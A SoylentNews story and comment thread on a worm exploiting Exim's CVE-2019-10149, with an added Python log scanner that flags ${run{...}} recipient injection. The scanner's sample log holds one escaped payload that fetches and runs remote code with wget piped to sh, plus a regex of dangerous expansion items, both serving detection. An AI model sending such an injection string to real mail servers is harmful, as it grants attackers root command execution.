
posted by chromas on Saturday June 15 2019, @04:30AM
from the post-fix-you-will-be-running-PostFix dept.

A flaw in versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) on Linux systems is being actively exploited in the wild. Exim version 4.92 is not vulnerable.

Exim runs an estimated 57 percent of the internet's publicly reachable mail servers. Attackers are exploiting the flaw, disclosed last week, to take control of victim machines, scan the internet for other vulnerable hosts, and install a cryptominer.

The vulnerability (CVE-2019-10149) is an input validation failure on the recipient address of an incoming message: Exim passes the recipient's local part through its string-expansion engine, so a crafted address containing an expansion item such as ${run{...}} runs a command on the server with Exim's privileges, which in the default setuid-root installation means root. The same expansion syntax is what a compromised server's logs show in the recipient field.
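To make the recipient-address point concrete, here is an added example (my own code, not code from Exim, the article, or the researchers it quotes). It checks whether a reported Exim version falls in the affected 4.87 to 4.91 range and scans Exim main-log lines for recipients that carry an expansion item such as ${run{...}}, decoding Exim's \xHH log escapes so the injected command is readable. The log lines, message IDs and addresses are constructed for the example, and the function and pattern names are my own.

```python
"""Spot ${run{...}}-style recipient abuse in Exim logs and flag affected versions.

Added example, not code from Exim or from the article. The sample log lines
below are constructed to mimic the Exim main-log format; they are not captures.
"""
import re
from typing import Dict, Iterable, List, Tuple

# Affected range named in the article: 4.87 up to and including 4.91.
VULN_LOW, VULN_HIGH = (4, 87), (4, 91)

# Expansion items that execute code or read files. A legitimate recipient
# local-part never contains these; "${run{...}}" is the one the worm used.
EXPANSION = re.compile(r"\$\{\s*(run|readfile|readsocket|perl|dlfunc)\b", re.I)

# Main-log "received" line (recipients appear after "for" when the
# received_recipients log selector is on):
#   <date> <time> <msgid> <= <sender> ... for <rcpt>[ <rcpt> ...]
RECEIVED = re.compile(r"^(\S+ \S+) (\S+) <= \S+ .* for (.+)$")

# Constructed sample (documentation addresses, made-up message IDs).
SAMPLE_LOG = r"""
2019-06-10 03:12:44 1haTzU-0001Fm-2N <= bounce@example.net H=(localhost) [203.0.113.7] P=esmtp S=1024 for ${run{\x2fbin\x2fsh\t-c\t\x22wget\x20-O-\x20http:\x2f\x2f203.0.113.7\x2fx\x20|\x20sh\x22}}@localhost
2019-06-10 03:13:01 1haU0H-0001Fp-5Q <= news@example.org H=mx.example.org [198.51.100.5] P=esmtps S=5120 for bob@mail.example.org
2019-06-10 03:14:10 1haU1O-0001Ft-8X <= alice@example.com H=(client) [192.0.2.9] P=esmtp S=800 for carol@mail.example.org dave@mail.example.org
""".strip().splitlines()


def parse_version(banner: str) -> Tuple[int, int]:
    """Turn 'Exim version 4.91 #1 built 15-Apr-2018' (or plain '4.91') into (4, 91)."""
    m = re.search(r"\b(\d+)\.(\d+)\b", banner)
    if m is None:
        raise ValueError(f"no Exim version found in {banner!r}")
    return int(m.group(1)), int(m.group(2))


def is_vulnerable(banner: str) -> bool:
    """True for 4.87..4.91; 4.92 and later (and releases before 4.87) are not affected."""
    return VULN_LOW <= parse_version(banner) <= VULN_HIGH


def decode_exim_escapes(s: str) -> str:
    r"""Undo Exim's log escaping (\xHH and \t) so an injected command reads normally."""
    s = re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)
    return s.replace(r"\t", "\t")


def suspicious_recipients(lines: Iterable[str]) -> List[Dict[str, str]]:
    """One record per received recipient whose address embeds an expansion item."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        m = RECEIVED.match(line)
        if m is None:
            continue  # not a "<=" line, or recipients were not logged
        stamp, msgid, rcpts = m.groups()
        for rcpt in rcpts.split():
            if EXPANSION.search(rcpt):
                hits.append({"time": stamp, "id": msgid, "recipient": rcpt,
                             "decoded": decode_exim_escapes(rcpt)})
    return hits


if __name__ == "__main__":
    for banner in ("Exim version 4.91 #1 built 15-Apr-2018", "Exim version 4.92 #3"):
        print(f"{banner!r}: vulnerable={is_vulnerable(banner)}")
    for hit in suspicious_recipients(SAMPLE_LOG):
        print(f"{hit['time']} {hit['id']} recipient expands to: {hit['decoded']}")
```

The "for" clause only appears on "<=" lines when received_recipients is part of log_selector; without it, the same address shows up on the "=>" delivery line, and rejected attempts land in the reject log, so point the pattern at those too on your own install. The match is on the expansion syntax itself rather than one known payload, so variants with different casing, whitespace or a different command are still caught; a clean log is no proof of a clean host, and the version check is what tells you whether to upgrade.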

An initial attack was detected by researcher Freddie Leeman on June 9th.

The more recent and sophisticated campaign first installs an RSA key for root SSH authentication on the compromised host (the attackers' public key is appended to root's authorized_keys, so their private key can log in as root), giving them persistent access beyond the initial command execution. With that foothold, the worm deploys a port scanner to find other vulnerable servers and installs a coin miner.

The campaign also appears to be "highly pervasive": it drops several payloads at different stages, including the port scanner and the coin miner, and takes extra steps to persist on the infected system.

"It is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm," researchers said. "They used hidden services on the Tor network to host their payloads and created deceiving Windows icon files [which is actually a password protected zip archive containing the coin miner executable] in an attempt to throw off researchers and even system administrators who are looking at their logs."

The attack is still being researched, and administrators running a vulnerable version of Exim are urged to upgrade to 4.92 or later.

Related
400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks


Original Submission

  • (Score: 0, Redundant) by realDonaldTrump on Saturday June 15 2019, @07:28AM (4 children)

    by realDonaldTrump (6614) on Saturday June 15 2019, @07:28AM (#855935) Homepage Journal

    They ran this one on Monday. Called, "New RCE Vulnerability Impacts Nearly Half of the Internet's EMAIL Servers." Does anyone remember? Possibly I'm the only one that remembers (I never forget). And it truly bears repeating. Very smart to keep repeating this one. Because so many folks got the "cheapest" EMAILS servers they could possibly find -- instead of the "best." Now they're paying the true price, and it's a very heavy one, believe me. Lot of suffering there for the folks that didn't go with Microsoft. Time to pony up and END THE SUFFERING. Thank you RandomFactor and, thank you Editor chromas for the beautiful reminder!!!!

  • (Score: -1, Troll) by Anonymous Coward on Saturday June 15 2019, @09:39AM (1 child)

    by Anonymous Coward on Saturday June 15 2019, @09:39AM (#855948)

    I'd like to believe you, but so many things you say aren't true. Perhaps you should've posted the link instead of the title. /s

    • (Score: -1, Flamebait) by realDonaldTrump on Saturday June 15 2019, @10:47AM

      by realDonaldTrump (6614) on Saturday June 15 2019, @10:47AM (#855955) Homepage Journal

      Crooked H, is that you calling me a Liar? If it's you, possibly your EMAILS is fine. Because you used to have a Microsoft EMAILS "server." And I assume you stuck with Microsoft Cyber. Their customers are very loyal because their product is the best on the market. As everyone knows.

      I'll tell you, Soylent News is known as the Home of Links to Nowhere. You try to Tweet a Link, you think it's O.K., sorry it's not. And even the Editors don't know how to make a Link. That's O.K. That's O.K. You don't have to believe me. And, you don't have to believe the story from Random Factor that says EXACTLY the same thing. Just keep doing what you're doing. Keep believing what you believe. And if you're doing the Exim "server" you may start to see many dirty pictures, and all kinds of "funny" squiggles in your EMAILS. The very special writing of the Chinese, the Korean and even Russian Hackers. Enjoy!!!

  • (Score: 2, Informative) by RandomFactor on Saturday June 15 2019, @01:51PM (1 child)

    by RandomFactor (3682) Subscriber Badge on Saturday June 15 2019, @01:51PM (#855982) Journal

    nice catch [soylentnews.org]
     
    Search fail looking for previous coverage.
    I would go with 'Update' in this case as the previous article was around the initial report of the vulnerability existing, this one is reporting on an active worm now circulating.
     
    The bright side is the worm is apparently not currently attempting to destroy data, just hide and burn CPU cycles for profit.

    --
    In Pravda there is no news; in Izvestia there is no truth
    • (Score: 0) by Anonymous Coward on Saturday June 15 2019, @04:11PM

      by Anonymous Coward on Saturday June 15 2019, @04:11PM (#856014)

      The bright side is the worm is apparently not currently attempting to destroy data, just hide and burn CPU cycles for profit.

      The downside is that it's taken them so long to notice the active exploit...I'd noticed weird goings on appearing in the exim main log (as opposed to the usual stuff in the error log) last month and hacked together some crude code to block the persistent miscreants at the firewall...I'd have modified the Exim code directly to do the same but, well, you know......